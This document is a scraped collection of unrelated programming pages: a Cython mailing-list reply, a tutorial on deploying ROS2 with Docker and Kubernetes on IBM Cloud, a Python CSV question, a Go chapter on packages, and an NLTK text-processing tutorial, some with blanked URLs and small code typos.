The Reuters Corpus contains nearly 11,000 news articles about a variety of topics and subjects. If you've run the nltk.download() command as previously recommended, you can then easily import and explore the Reuters Corpus like so:

from nltk.corpus import reuters

print '** BEGIN ARTICLE: ** \"' + reuters.raw(reuters.fileids()[0])[:500] + ' [...]\"'

Our painfully simplistic automatic summarization tool will implement the following steps:

Sounds easy enough, right? But before we can say "voila!," we'll need to figure out how to calculate an "importance" score for words. As we saw above with stop words, etc., simply counting the number of times a word appears in a document will not necessarily tell you which words are most important.

Consider a document that contains the word baseball 8 times. You might think, "wow, baseball isn't a stop word, and it appeared rather frequently here, so it's probably important." And you might be right. But what if that document is actually an article posted on a baseball blog? Won't the word baseball appear frequently in nearly every post on that blog? In this particular case, if you were generating a summary of this document, would the word baseball be a good indicator of importance, or would you maybe look for other words that help distinguish or differentiate this blog post from the rest?

Context is essential. What really matters here isn't the raw frequency of the number of times each word appeared in a document, but rather the relative frequency comparing the number of times a word appeared in this document against the number of times it appeared across the rest of the collection of documents. "Important" words will be the ones that are generally rare across the collection, but which appear with an unusually high frequency in a given document. We'll calculate this relative frequency using a statistical metric called term frequency - inverse document frequency (TF-IDF).
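Before handing the job to scikit-learn, the intuition can be sketched in a few lines of plain Python 3. The toy corpus and the exact weighting formula here are illustrative only; real implementations such as scikit-learn's use smoothed variants:

```python
import math

# Toy corpus standing in for the baseball-blog scenario above.
docs = [
    "the pitcher threw the baseball".split(),
    "baseball is played with a baseball bat".split(),
    "the stock market fell sharply".split(),
]

def tf_idf(term, doc, docs):
    tf = doc.count(term) / len(doc)         # term frequency in this document
    df = sum(1 for d in docs if term in d)  # how many documents contain it
    idf = math.log(len(docs) / df)          # rare across the corpus => larger
    return tf * idf

doc = docs[1]
# "baseball" is frequent here but common across the corpus, so its IDF is modest;
# "bat" is rarer corpus-wide, so it ends up with the higher score.
print(tf_idf("baseball", doc, docs))
print(tf_idf("bat", doc, docs))
```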
We could implement TF-IDF ourselves using NLTK, but rather than bore you with the math, we'll take a shortcut and use the TF-IDF implementation provided by the scikit-learn machine learning library for Python. We'll use scikit-learn's TfidfVectorizer class to construct a term-document matrix containing the TF-IDF score for each word in each document in the Reuters Corpus. In essence, the rows of this sparse matrix correspond to documents in the corpus, the columns represent each word in the vocabulary of the corpus, and each cell contains the TF-IDF value for a given word in a given document.

Inspired by a computer science lab exercise from Duke University, the code sample below iterates through the Reuters Corpus to build a dictionary of stemmed tokens for each article, then uses the TfidfVectorizer and scikit-learn's own built-in stop words list to generate the term-document matrix containing TF-IDF scores.

import datetime, re, sys
from sklearn.feature_extraction.text import TfidfVectorizer

def tokenize_and_stem(text):
    tokens = [word for sent in nltk.sent_tokenize(text) for word in nltk.word_tokenize(sent)]
    filtered_tokens = [t for t in tokens if re.search('[a-zA-Z]', t)]  # drop raw punctuation & numbers
    return [stemmer.stem(t) for t in filtered_tokens]

token_dict = {}
for article in reuters.fileids():
    token_dict[article] = reuters.raw(article)

tfidf = TfidfVectorizer(tokenizer=tokenize_and_stem, stop_words='english', decode_error='ignore')
print 'building term-document matrix... [process started: ' + str(datetime.datetime.now()) + ']'
sys.stdout.flush()

tdm = tfidf.fit_transform(token_dict.values()) # this can take some time (about 60 seconds on my machine)
print 'done! [process finished: ' + str(datetime.datetime.now()) + ']'

from random import randint

feature_names = tfidf.get_feature_names()
print 'TDM contains ' + str(len(feature_names)) + ' terms and ' + str(tdm.shape[0]) + ' documents'
print 'first term: ' + feature_names[0]
print 'last term: ' + feature_names[len(feature_names) - 1]
for i in range(0, 4):
    print 'random term: ' + feature_names[randint(1, len(feature_names) - 2)]

That's all we'll need to produce a summary for any document in the corpus.
In the example code below, we start by randomly selecting an article from the Reuters Corpus. We iterate through the article, calculating a score for each sentence by summing the TF-IDF values for each word appearing in the sentence. We normalize the sentence scores by dividing by the number of tokens in the sentence (to avoid bias in favor of longer sentences). Then we sort the sentences by their scores, and return the highest-scoring sentences as our summary. The number of sentences returned corresponds to roughly 20% of the overall length of the article.

Since some of the articles in the Reuters Corpus are rather small (i.e., a single sentence in length) or contain just raw financial data, some of the summaries won't make sense. If you run this code a few times, however, you'll eventually see a randomly-selected article that provides a decent demonstration of this simplistic method of identifying the "most important" sentences in a document.

from __future__ import division
import math

article_id = randint(0, tdm.shape[0] - 1)
article_text = reuters.raw(reuters.fileids()[article_id])

sent_scores = []
for sentence in nltk.sent_tokenize(article_text):
    score = 0
    sent_tokens = tokenize_and_stem(sentence)
    for token in (t for t in sent_tokens if t in feature_names):
        score += tdm[article_id, feature_names.index(token)]
    sent_scores.append((score / len(sent_tokens), sentence))

summary_length = int(math.ceil(len(sent_scores) / 5))
sent_scores.sort(key=lambda sent: sent[0], reverse=True)

print '*** SUMMARY ***'
for summary_sentence in sent_scores[:summary_length]:
    print summary_sentence[1]

print '\n*** ORIGINAL ***'
print article_text

That was fairly easy, but how could we improve the quality of the generated summary? Perhaps we could boost the importance of words found in the title or any entities we're able to extract from the text.
After initially selecting the highest-scoring sentence, we might discount the TF-IDF scores for duplicate words in the remaining sentences in an attempt to reduce repetitiveness. We could also look at cleaning up the sentences used to form the summary by fixing any pronouns missing an antecedent, or even pulling out partial phrases instead of complete sentences. The possibilities are virtually endless. Want to learn more? Start by working your way through all the examples in the NLTK book (aka "the Whale book"):
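The redundancy-discounting idea can be sketched as a greedy loop. This is my own illustrative simplification, not code from the presentation: after each pick, zero out the weights of words the summary already covers.

```python
# Greedy redundancy-aware sentence selection (illustrative sketch).
# Each sentence is a list of tokens; weights maps token -> importance score.

def pick_summary(sentences, weights, k):
    remaining = dict(weights)   # copy so we can discount as we go
    summary = []
    pool = list(sentences)
    for _ in range(min(k, len(pool))):
        # Score = sum of current weights, normalized by sentence length.
        best = max(pool, key=lambda s: sum(remaining.get(t, 0) for t in s) / len(s))
        summary.append(best)
        pool.remove(best)
        for t in best:          # words already covered stop contributing
            remaining[t] = 0
    return summary

weights = {"court": 3.0, "ruling": 2.5, "appeal": 2.0, "weather": 0.1}
sentences = [
    ["court", "ruling"],
    ["court", "ruling", "appeal"],  # overlaps heavily with the first
    ["weather", "appeal"],
]
print(pick_summary(sentences, weights, 2))
```

Without the discounting step, the second pick would be the heavily overlapping second sentence; with it, the loop prefers a sentence that adds new words.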
https://nbviewer.ipython.org/github/charlieg/A-Smattering-of-NLP-in-Python/blob/master/A%20Smattering%20of%20NLP%20in%20Python.ipynb
I have a complex View with UserControls that need to be updated. The easiest way of doing so, as I see it so far, is by using a message mediation service such as MVVM Light Messenger. However, in this case I will need to have some handling code in my View, w f

We can increase the number of view sessions in JSF by specifying larger numbers for numberOfViewsInSession and numberOfLogicalViews in web.xml. However, we have faced a difficult problem with multiple browser tabs. When a user opens multiple

Following is my controller class:

namespace Admin;

class CategoriesController extends \BaseController {
    public function index($action = '', $id = ''){
        //return \View::make('welcome'); View is correctly rendered here
        switch ($action){
            case '' :
            case 'li

I have created the following, on which I can perform a query without a WHERE clause, but when I use the following query: select * from teacherSub where teacher = "te123"; it generates an error: Msg 207, Level 16, State 1, Line 2. Full code: US

I am looping over a collection of Person in a Scala view in Play Framework 2.2.6. The Person class is the superclass of the classes User and Contact. While looping, I would like to access some parameters specified on the extending classes, such as the email attribute of the User class.

I am busy building a tagging system in RoR. This system I've coded according to: Now when I print out tag.name it works, but I also get what looks like the entire tag_list as an object

I have developed a Rails app with three classes:

class Location < ActiveRecord::Base
  has_many :observations
end

class Observation < ActiveRecord::Base
  belongs_to :location
  has_one :rainfall
  has_one :temperature
  has_one :winddirection
  has_one :windspee

Can anyone help me? I need to display 2 tables on one page. Those 2 tables are actually shopping cart info, but hold different content types. is the link of an image of how the page should be seen.

--------------Solutions-------------

You could

In my MVC application:

@using (Html.BeginForm()) {
    @Html.DropDownList("ddllanguage", Model.Language, new {@ }
<h4>@MyHelper.Translate("Welcome","EN")</h4>

On button sub

I'm trying to get the levels of a user from my DB and print them in a view, but I can't do it. Controller:

public function add_notificacion() {
    $data = array();
    if (!empty($this->input->post('mensaje', TRUE))) {
        if (($this->input->post

I have a feature in my project called calendar. Users are able to add 'Events' and 'Event Types'. When a user clicks on 'Add New Event', he or she is redirected to the 'Add New Event' page. Inside, the page contains a dropdown field 'Event Type'. There

I want to create my own login page using the e-mail address and password in Django 1.7. When I complete the box and click "login", the page goes back to the login page. My view:

def get_user_by_email(email):
    try:
        return User.objects.get(email=email)
    except User.Doe

I have a question about how this works; currently I'm away from college and there's no way I can ask my professor about this question, so hopefully you guys can help me out. So, I've got a login panel made in XAML (the password thing has a class because o

I would like to create a view of multiple tables but no joins: SELECT * Table1, Table2, Table3. But the server is changing this to: Select * Table1 CROSSJOIN Table2 CROSSJOIN Table3. Is this not possible? I have 4 tables... Products, Forms, Specificat

I have several data tables / entities (APRICOT, BANANA, LEMON) in the same EDMX, and each table has multiple columns (Name, Quantity, Date, Sort). In a view, I have a drop-down list (DropDownList) which contains ("A", "B" and "C"). What I want to do: In

I am trying to programmatically create a gray Rect and a black Rect with a BlurMaskFilter layer (drop shadow effect) by overriding onDraw in a custom View. I am able to get it to draw on screen without any issues, but when I try to draw the view to a bit

Here is my entity class to map a view of a PostgreSQL database. The view is created with the same query as with @Subselect. The script is:

create view meeting_result as
SELECT id, subject, from_time, to_time, host, created_by, asst_host, status,
CASE WHEN fro
http://www.pcaskme.com/tag/view/
CodePlex Project Hosting for Open Source Software

I followed a bunch of examples, read the documentation, and read the forums. I have an extremely simple rule that will not load into the settings. There is no logging, so I cannot discover the silent error. Everything is named InstanceVariablesUnderscorePrefix.something. The target build platform is 3.5. Without any error message, I have no idea where to go next. The following code was shamelessly stolen from somebody else's example online.

using Microsoft.StyleCop;
using Microsoft.StyleCop.CSharp;

/// <summary>
/// This StyleCop rule makes sure that instance variables are prefixed with an underscore.
/// </summary>
[SourceAnalyzer(typeof(CsParser))]
public class InstanceVariablesUnderscorePrefix : SourceAnalyzer
{
    public InstanceVariablesUnderscorePrefix()
    {
    }

    public override void AnalyzeDocument(CodeDocument document)
    {
        CsDocument csdocument = (CsDocument)document;
        if (csdocument.RootElement != null && !csdocument.RootElement.Generated)
            csdocument.WalkDocument(new CodeWalkerElementVisitor<object>(this.VisitElement), null, null);
    }

    private bool VisitElement(CsElement element, CsElement parentElement, object context)
    {
        // Flag a violation if the instance variables are not prefixed with an underscore.
        if (!element.Generated && element.ElementType == ElementType.Field
            && element.ActualAccess != AccessModifierType.Public
            && element.ActualAccess != AccessModifierType.Internal
            && element.Declaration.Name.ToCharArray()[0] != '_')
        {
            AddViolation(element, "InstanceVariablesUnderscorePrefix");
        }
        return true;
    }
}

<?xml version="1.0" encoding="utf-8" ?>
<SourceAnalyzer Name="Extensions">
  <Description>
    These custom rules provide extensions to the ones provided with StyleCop.
  </Description>
  <Rules>
    <RuleGroup Name="Formatting Rules">
      <Rule Name="InstanceVariablesUnderscorePrefix" CheckId="EX1001">
        <Context>Instance variables should be prefixed by underscore.</Context>
        <Description>Instance variables are easier to distinguish when prefixed with an underscore.</Description>
      </Rule>
    </RuleGroup>
  </Rules>
</SourceAnalyzer>

Thanks!

Hi,

At the risk of seeming annoying, I will recommend taking a look at It allows great flexibility in naming rules (and supports the rule you mentioned as well). Considering your very example, I could try to help you a bit later (in 2 weeks), if you are still interested.

Best regards, Oleg Shuruev

I downloaded it and have it installed. Nice. Seems to work reasonably well for a beta. :-) It has all the additional rules that I need to adjust for my company's style rules. Thanks for the pointer!

Hi again,

As promised, I can give you a little help now. If you really want to learn how to make your own rules, just e-mail (or share in any other way) your entire project with me (the csproj file among others). I will inspect it and tell you the exact reason why it doesn't work.

Best regards, Oleg Shuruev

Thanks, but your StyleCop+ works for every single change that I needed, so I don't need to bother with getting my own code to work. If I do need the help later, I'll ask again. Thank you! --Sean

Hi there! I am also encountering a problem installing a StyleCop custom rule I created. It seems that Settings.StyleCop does not load the custom rule. I've followed all the solutions presented in the CodePlex forums and elsewhere, but it still doesn't work. Can you help me out with this? Thanks a lot.

spongebob21 wrote: Can you help me out with this?

Sure, just e-mail me your entire project (as I wrote above).

Where are you putting your dll? Try putting it next to the built-in rule dll. /Bo

@BoLund: I've already placed it next to the built-in rules at C:\Program Files\Microsoft StyleCop 4.4.0.14, but it still doesn't work..
@shuruev: Ok, I'll send you the project.

I've reviewed your project very attentively, and technically it's OK. It can be successfully loaded as an add-in and displayed in the settings window. I even tried how your rule works, and it is quite workable too (at least it performs what you ask it to perform). So it would be nice if you specified in more detail what your problem is. For example, if you try the following:

- take StyleCopCustomRule.dll from your bin folder (from the archive you sent)
- place it in C:\Program Files\Microsoft StyleCop 4.4.0.14
- drag & drop Settings.StyleCop onto StyleCopSettingsEditor.exe

you should see your rule displayed in the settings window. Could you please try it?

The other thing I would like to draw your attention to is StyleCop+ (already mentioned above in this thread). It allows great flexibility in naming rules (and supports the rule you are creating as well).

At last it works! Thanks for the great help, shuruev. Yeah, you're right, my project is OK. The only reason my custom rule was not being loaded is that I didn't drag and drop Settings.StyleCop onto StyleCopSettingsEditor.exe; instead I just double-clicked Settings.StyleCop. Thanks again.. Ok, I'll try StyleCop+ soon. By the way, Shuruev, do StyleCop reports support stylesheets? If yes, how can I apply a stylesheet to the StyleCop report that is being generated?
As this question raised quite often, I have created simple step-by-step guide for custom StyleCop rules creation: Could you please check it out and give any feedback whether it was useful enough to solve your issues? Thanks a lot! @dsscaze: If you exactly follow the steps explained in the WIKI, you will succeed. Important is, that you double check the versions of StyleCop installed on your machine and the reference in your custom rules project must be exactly the same. Otherwise the extension just doesn't get loaded. The xml where you define your rules must also follow all the rules explained. I struggled also a lot in the beginning. If all of that doesn't help, try using Sysinternal's ProcessMonitor or Fusion Log (fslogvw from a VS command prompt). This might help identifying the problem. Good Luck Thomas Are you sure you want to delete this post? You will not be able to recover it later. Are you sure you want to delete this thread? You will not be able to recover it later.
http://stylecop.codeplex.com/discussions/229220
CC-MAIN-2018-05
refinedweb
1,075
59.09
File Path compare in java

Related discussions:
- File Path Comparison: compareTo -- In this section, we will discuss how to compare the pathnames of two files for equality.
- compare two strings in java -- How to compare two strings in Java?
  package Compare;
  public class StringTest {
      public static void main(String[] args) {
          String str = "Roseindia";
          String str1 = "Roseindia";
          System.out.println(str.equals(str1)); // true: equals() compares contents
      }
  }
- Compare two word file -- How to compare two Word files using Java?
- Compare 2 files -- I would like to compare 2 files in Java. Please send code to compare these files and print the difference. The file name will normally be the last 16 characters of a line.
- How do I compare strings in Java?
- java code to compare two hash map objects
- Java : String Compare -- This tutorial demonstrates various ways to compare two strings. In Java, you can compare strings in many ways: the == operator, the equals method, and the compareTo method.
- path - Java Beginners -- What is the meaning of path and classpath, and how are they set in environment variables?
- how to compare 2 arrays using java? -- Can anyone give me information regarding comparison of arrays?
- Compare strings example -- In this section, you will learn how to compare two strings in Java. The java.lang package provides methods to compare two strings.
- Class Path - Java Beginners -- How to set the class path (under environment variables, in user or system variables).
- set class path -- How to set the class path in Java?
- Compare two char array in java -- This tutorial demonstrates how to check whether two character arrays are equal: Arrays.equals(c1, c2) compares them and returns a boolean value (import java.util.Arrays).
- java program to compare two hashmaps and check whether they are equal or not
- Java IO Path -- In this section we will discuss the Java IO Path: the path of a file or folder, using which it can be accessed easily. In a file path the character '\' is a directory separator.
- wt is the advantage of myeclipse ide compare to others -- Advantages: 1) extendable, 2) best CVS/SVN support, ... 5) easy extensions to Java tooling, 6) a portable and customizable platform.
- poi & class path - Java Beginners -- After downloading, how do I set the class path? Download the zip file, then set the path in the 'PATH' variable of the environment.
- How Compare 2 xml files with JDOM - Java Beginners -- I want help on how to compare 2 XML files using JDOM in Java and identify whether they have the same content or not. My files can simply be File1 and File2.
http://roseindia.net/discussion/29815-File-Path-compare-in-java.html
Long running conversation
Gene Campbell, Jan 21, 2008 7:18 PM

I have this Seam POJO Action:

@Name("bean")
@Scope(ScopeType.CONVERSATION)
@Conversational
public class BeanAction implements Serializable {

    @Begin(join=true)
    @Create
    public void create() {
        log.debug("Starting Conversation id: " + Conversation.instance().getId()
            + " long running?: " + Conversation.instance().isLongRunning());
    }
}

When I browse bean.xhtml (Facelets/JSF), the log says:

Starting Conversation id: 1 long running?: false

Why false? I thought it should be true. And, when I submit a form on the page like this:

<h:commandButton ...>
    <s:conversationPropagation .../>
</h:commandButton>

I get an exception saying my bean isn't in the context. And it seems that the conversation isn't available, which would make sense if it truly isn't long running, right? I'm quite confused, so my message may be lacking information to totally make sense. If so, ask questions.

javax.servlet.ServletException: /bean.xhtml @59,55 binding="#{bean.table}": Target Unreachable, identifier 'bean' resolved to null
    at javax.faces.webapp.FacesServlet.service(FacesServlet.java:256)
In any case this was related to the JSF binding issues you pointed out in another thread. thanks for you responses and help!!
https://developer.jboss.org/message/494771
CC-MAIN-2019-09
refinedweb
339
51.55
: 3V0OrtKbc3f4xTn6.0 Using Basic AT Modem Commands Print This article was previously published under Q164659 This article has been archived. It is offered "as is" and will no longer be updated. SUMMARY NOTE: These are general modem commands. Certain commands may not work withall modems. Consult the documentation for your modem if you experiencedifficulties, or contact your modem manufacturer's technical supportdepartment. All commands except two must begin with the characters AT. The twoexceptions are the escape sequence (+++), and the repeat command (A/). Thecommand line prefix (letters AT), and the command sequences that follow,can be typed in uppercase or lowercase (used on older modems), butgenerally case must not be mixed. More than one command can be typed onone line; you may separate them by spaces for easier reading. The spacesare ignored by the modem's command interpreter but are included in thecharacter count on the input line. With most modems, the command linebuffer accepts up to 39 characters including the A and T characters.Spaces, carriage return, and any line feed characters do not go into thebuffer, and do not count against the 39 character limitation. Some modemshave line length limitations as low as 24 characters. Others may have alarger buffer. Refer to modem documentation for specifics about yourparticular modem. If more than 39 characters are entered, or a syntaxerror is found anywhere in the command line, the modem returns an ERRORresult code, and the command input is ignored. MORE INFORMATION Basic Commands With the following basic AT commands, you can make calls directly, selectthe dialing method (tone or pulse), control the speaker volume, andperform a number of other basic modem operations. IMPORTANT: You must be in the Command mode of your communication softwareto use the AT commands. Refer to the documentation that came with yourcommunications software for information on entering the Command mode. 
AT : Attention. This prefix begins all but two commands you issue to the modem locally, and tells the modem ATtention! -- commands follow.

D : Dial. Use the D command to dial a telephone number from the command line.

+++ : Escape sequence. While connected to another modem, you may need to return to command mode to adjust the modem configuration, or, more commonly, to hang up. To do this, leave your keyboard idle (press no keys) for at least one second, and then press the plus sign (+) three times. This is one of the two commands that do not use the AT prefix, or a carriage return to enter. After a moment, the modem will respond with OK, indicating you have been returned to command mode.

P : Pulse dialing. Also known as rotary dialing, this dial modifier follows the D command and precedes the telephone number to tell the modem to dial the number using pulse service. For example, to dial the number 123-4567 on a pulse phone line, type "ATDP 1234567".

T : Tone dialing. This modifier selects the tone method of dialing using DTMF tones. Note: Tone and pulse dialing can also be combined in a dial command line when both dialing methods are required. For example, to dial the number 123-4567 on a touch-tone phone line, type "ATDT 1234567".

Dial Command Modifiers

Command modifiers define additional parameters to the modem that instruct the modem to perform certain functions automatically when dialing a phone number. They are only valid when they are contained in a dial string (that follows the D command). The commands that are used to accomplish this task are called dial modifiers, and are placed in the dial string prior to issuing the command.

Syntax: ATD{dial modifier} 1234567 [Enter]

; : Resume command mode after dialing. If you need to dial a number that is too long to be contained in the command buffer (45 characters for the D command), use the semicolon (;) modifier to separate the dial string into multiple dial commands. All but the last command must end with the ; modifier.

, : Pause While Dialing.
The comma (,) dial modifier causes the modem to pause while dialing. The modem will pause the number of seconds specified in S-Register S8 and then continue dialing. If a pause time longer than the value in S-Register S8 is needed, it can be increased by either inserting more than one comma (,) in the dial command line or changing the value of S-Register S8. In the following example, the command accesses the outside (public) telephone line with the 9 dial modifier. Because the comma (,) dial modifier is present, the modem delays before dialing the telephone number 5551212. Example: ATD 9, 5551212 [Enter]

! : Using the Hook Flash. The exclamation point (!) dial modifier causes the modem to go on-hook (hang up) for one-half second and is equivalent to holding down the switch-hook on your telephone for one-half second. This feature is useful when transferring calls.

W : Wait for a Subsequent Dial Tone. The W dial modifier causes a modem to wait for an additional dial tone before dialing the numbers that follow the W. The length of time the modem waits depends on the value in S-Register S7. The modem can be instructed to dial through Private Branch Exchanges (PBXs) or long-distance calling services that require delays during dialing. This can be done with the W command to wait for a secondary dial tone or with a comma (,) command to pause for a fixed time and then dial. Example: ATDT 9 W 1 2155551212 [Enter]

A/ : Repeat. This command does not use the AT prefix, nor does it require a carriage return to enter. Typing this command causes the modem to repeat the last command line entered, and it is most useful for redialing telephone numbers that are busy.

&Fn : Factory Defaults. This command (in which n=0 or 1) returns all parameters to the selected set of factory defaults if the modem has factory defaults; not all modems do.

H : Hang Up. This command tells the modem to go "on-hook," or disconnect, the telephone line.

O : Online.
This command returns the modem to the on-line mode and is usually used after the escape sequence (+++) to resume communication.

Zn : Reset Modem. This command (in which n=0 or 1) resets the modem to the configuration profile stored in non-volatile memory location 0 or 1.

Making a Call

The following examples show how to place a call using several of the dial modifiers.

To manually dial the phone, you should be in your communications software's command mode.
1. Lift the receiver of the telephone and dial the number you wish to call.
2. Type ATH1 and press ENTER to connect the modem, and then hang up the receiver.
3. Type ATO and press ENTER to tell the modem to go online.

Manual Answer

When the automatic answer feature (S-Register S1) is not being used, incoming calls can be answered manually by typing ATA and then pressing ENTER when an incoming call is received. The modem will answer the incoming call and enter the on-line mode.

Each command line must be terminated by a carriage return (Enter). A mixed-case set (At or aT) is not allowed. The AT sequence is called the Attention command. The Attention command precedes all other commands except re-execute (A/) and the escape (+++) code.
The maximum number ofcharacters on any command line is 56 (including A and T). Additional information may be found at the Hayes Web site and the USRobotics Web site. Also, your modem manufacturer may have additionalinformation about commands that your modem supports. networking Properties Article ID: 164659 - Last Review: 12/04/2015 16:29:40 -bnosurvey kbarchive kbinfo
https://support.microsoft.com/en-us/kb/164659
Internet Datalogging With Arduino and XBee WiFi

This Tutorial is Retired! This tutorial covers concepts or technologies that are no longer current. It's still here for you to read and enjoy, but may not be as useful as our newest tutorials.

Introduction

Phant is No Longer in Operation

In this tutorial we'll build an office conditions logger. Logging data to the web provides many advantages over local storage -- most significantly, it gives you instant and constant access to logged data. The trade-off for that instant data access is a loss of privacy, but, if you don't care who knows what the temperature, light, or methane (well...) levels in your office are, then logging data to data.sparkfun.com is an awesomely easy solution.

Required Materials

We'll use a variety of simple analog sensors to create an "Office Conditions Logger", but the hardware hookup and example code should be easily adaptable to more unique or complex sensors. Here's a list of stuff I used to make my logger:

Some notes on this wishlisted bill of materials:

- You'll also need some breadboarding tools -- a breadboard and jumper wire.
- To assemble the shield you'll need soldering tools and headers.
- I didn't add resistors to that list, but you'll need a few 10kΩ-22kΩ resistors to complete the circuit. If you don't already have one, we recommend grabbing an ever-handy resistor kit.
- The XBee Shield can be swapped out for a Regulated Explorer, or even something as simple as an XBee Breakout, with some additional jumper wires (and maybe level shifting).
- I'm using the RedBoard, but any Arduino-compatible board will work, whether it's an Uno, Leonardo or Mega.

These days Arduinos have no shortage of routes to the Internet. I'm using the XBee WiFi modules because they're simple to use, relatively low-cost, and they work with XBee Shields (which you may already have in your electronics toolkit).
So, while the code in this tutorial is specific to that module, it should be adaptable to the WiFi Shield, Ethernet Shield, CC3000 Shield, or whatever means your Arduino is using to access the Internet.

Suggested Reading

- XBee WiFi Hookup Guide -- This is a good place to start, especially if you need to get your XBee WiFi configured to connect to your WiFi network.
- XBee Shield Hookup Guide -- We'll use the XBee Shield to interface the XBee WiFi with an Arduino. Learn all about the shield in this tutorial.
- Analog-to-Digital Converters (ADCs) -- All of our sensors in this example are analog, so we'll be relying on the Arduino's ADC to read those analog voltages and turn them into something digital.
- How to Power Your Project -- The gas sensors can consume quite a bit of power; check out this tutorial to get some ideas for how to power your project.

Hardware Hookup

On this page we'll discuss the schematic and wiring of this project. We can divide our circuit up into two sub-systems -- the XBee WiFi and the sensors -- and wire them separately.

Connect the XBee WiFi

The difficulty level of this step depends on whether you're using a Shield (easiest), an XBee Regulated Explorer (easy-ish), or a more general XBee Breakout (easy after you've figured out level-shifting). If you're using a Shield, simply populate your headers and plug stuff in. Make sure the switch is in the DLINE position!
Connect Your Sensors I'm using a collection of analog sensors to monitor carbon monoxide, methane, temperature, and light conditions in the office. Here's how everything is hooked up: If you just want to try the data logging system out, don't feel required to connect all of those sensors. Heck, you can even leave all of those analog input pins floating to test everything out. Adding more complex sensors shouldn't take too much extra effort. I'll try to keep the code modular, so you can plug your own sensor-reading functions in. Configure the XBee WiFi The example code will attempt to configure your XBee -- given an SSID, passkey, and encryption mode -- but you can give it a head start by using XCTU to configure your XBee's network settings. If you have a USB Explorer or any other means for connecting your XBee to your computer, we recommend following along with the Using XCTU page of our XBee WiFi Hookup Guide to at least configure the module with your WiFi network's SSID and password. Set Up a Data Stream If this is your first SparkFun data stream, follow along here as we walk you through the process of creating a feed. Create a Feed To begin, "methane", "co", "temp" and "light" to describe the readings. Once you've figured all of that out, click Create!. Anatomy of a Feed After you've created your feed you'll be led to the stream's key page. Copy down all of the information on this page! Better yet, take advantage of the "Email a Copy" section at the bottom to get a more permanent copy of the keys. A quick overview on the keys: - Public Key -- This is a long hash that is used to identify your stream and provide a unique URL. This key is publicly visible -- anyone who visits your stream's URL will be able to see this hash. - Private Key -- The private key is required in order to post data to the stream. Only you should know this key. - Delete Key -- Normally you'll want to avoid this key, as it will delete your stream in its entirety. 
If you messed up -- maybe you want to add or modify a field -- this key, and the delete URL, may come in handy. - Fields -- Not highlighted in the image above are the four fields we defined when we were creating this stream -- "methane", "co", "temp" and "light". Those fields are used to set specific values and create a new log of data. Check out the example under "Logging using query string params" to see how those fields are used. Now that you've created your stream, and have the hardware set up, you have everything you need to start coding. To the next page! Modify and Upload the Code Download and Install the Phant Arduino Library The sensational creators of the SparkFun data stream service have developed an Arduino library to make posting data to a stream as easy as can be. The Phant Arduino library helps to manage keys and fields, and even assembles HTTP POSTs for you to send to a server. Head over to the phant-arduino GitHub repo to download a copy (click the "Download ZIP" link on the bottom-right side of the page) or click here if you want to avoid a trip to GitHub. Install the library by extracting it to the libraries folder within your Arduino sketchbook. Check out our Installing an Arduino Library tutorial for help with that. Download and Modify the Example Code Click here to download the example sketch or copy and paste from below: language:c /***************************************************************** Phant_XBee_WiFi.ino Post data to SparkFun's data stream server system (phant) using an XBee WiFi and XBee Shield. Jim Lindblom @ SparkFun Electronics Original Creation Date: May 20, 2014 This sketch uses an XBee WiFi and an XBee Shield to get on the internet and POST analogRead values to SparkFun's data logging streams (). Hardware Hookup: The Arduino shield makes all of the connections you'll need between Arduino and XBee WiFi. If you have the shield make sure the SWITCH IS IN THE "DLINE" POSITION. 
I've also got four separate analog sensors (methane, co, temperature, and photocell) connected to pins A0-A3. Feel free to switch that up. You can post analog data, digital data, strings, whatever you wish to the Phant server. Requires the lovely Phant library: Development environment specifics: IDE: Arduino 1.0.5 Hardware Platform: SparkFun RedBoard XBee Shield & XBee WiFi (w/ trace antenna)> // The Phant library makes creating POSTs super-easy #include <Phant.h> // Time in ms, where we stop waiting for serial data to come in // 2s is usually pretty good. Don't go under 1000ms (entering // command mode takes about 1s). #define COMMAND_TIMEOUT 2000 // ms //////////////////////// // WiFi Network Stuff // //////////////////////// // Your WiFi network's SSID (name): String WIFI_SSID = "WIFI = "WIFI_PASSWORD_HERE"; ///////////////// //", "Public_Key", "Private_Key"); // Phant field string defintions. Make sure these match the // fields you've defined in your data stream: const String methaneField = "methane"; const String coField = "co"; const String tempField = "temp"; const String lightField = "light"; //////////////// //) ///////////////////////////// // Sensors/Input Pin Stuff // ///////////////////////////// const int lightPin = A0; // Photocell input const int tempPin = A1; // TMP36 temp sensor input const int coPin = A2; // Carbon-monoxide sensor input const int methanePin = A3; // Methane sensor input // opVoltage - Useful for converting ADC reading to voltage: const float opVoltage = 4.7; float tempVal; int lightVal, coVal, methaneVal; ///////////////////////// // Update Rate Control // ///////////////////////// // Phant limits you to 10 seconds between posts. 
Use this variable // to limit the update rate (in milliseconds): const unsigned long UPDATE_RATE = 300000; // 300000ms = 5 minutes unsigned long lastUpdate = 0; // Keep track of last update time /////////// // Setup // /////////// // In setup() we configure our INPUT PINS, start the XBee and // SERIAL ports, and CONNECT TO THE WIFI NETWORK. void setup() { // Set up sensor pins: pinMode(lightPin, INPUT); pinMode(coPin, INPUT); pinMode(methanePin, INPUT); pinMode(tempPin, INPUT); // Set up serial ports: Serial.begin(9600); // Make sure the XBEE BAUD RATE matches its pre-set value // (defaults to 9600). xB.begin(XBEE_BAUD); // Set up WiFi network Serial.println("Testing network"); // connectWiFi will attempt to connect to the given SSID, using // encryption mode "encrypt", and the passphrase string given. connectWiFi(WIFI_SSID, WIFI_EE, WIFI_PSK); // Once connected, print out our IP address for a sanity check: Serial.println("Connected!"); Serial.print("IP Address: "); printIP(); Serial.println(); // setupHTTP() will set up the destination address, port, and // make sure we're in TCP mode: setupHTTP(destIP); // Once everything's set up, send a data stream to make sure // everything check's out: Serial.print("Sending update..."); if (sendData()) Serial.println("SUCCESS!"); else Serial.println("Failed :("); } ////////// // Loop // ////////// // loop() constantly checks to see if enough time has lapsed // (controlled by UPDATE_RATE) to allow a new stream of data // to be posted. // Otherwise, to kill time, it'll print out the sensor values // over the serial port. void loop() { // If current time is UPDATE_RATE milliseconds greater than // the last update rate, send new data. 
